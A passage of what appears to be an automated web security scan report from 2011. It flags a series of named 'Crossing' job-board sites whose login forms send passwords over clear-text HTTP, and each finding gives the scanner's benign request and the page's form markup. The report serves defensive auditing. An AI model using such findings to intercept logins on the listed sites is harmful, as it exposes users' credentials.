Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.cpluspluscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.31. http://www.customerservicecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.customerservicecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.customerservicecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.customerservicecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.32. http://www.dbacrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dbacrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.dbacrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125721

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dbacrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.33. http://www.dentalcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dentalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.dentalcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.34. http://www.designingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.designingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.designingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122676

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.designingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.35. http://www.diversitycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.diversitycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.diversitycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.diversitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.36. http://www.dotnetcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dotnetcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.dotnetcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111450

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dotnetcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.37. http://www.ecommercecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ecommercecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ecommercecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122922

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.ecommercecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.38. http://www.editingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.editingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.editingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.editingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.39. http://www.educationcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.educationcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.educationcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.educationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.40. http://www.employmentcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.employmentcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.employmentcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.employmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.41. http://www.energycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.energycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.energycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117799

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.energycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.42. http://www.engineeringcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.engineeringcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.engineeringcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache/2.2.3 (Red Hat)
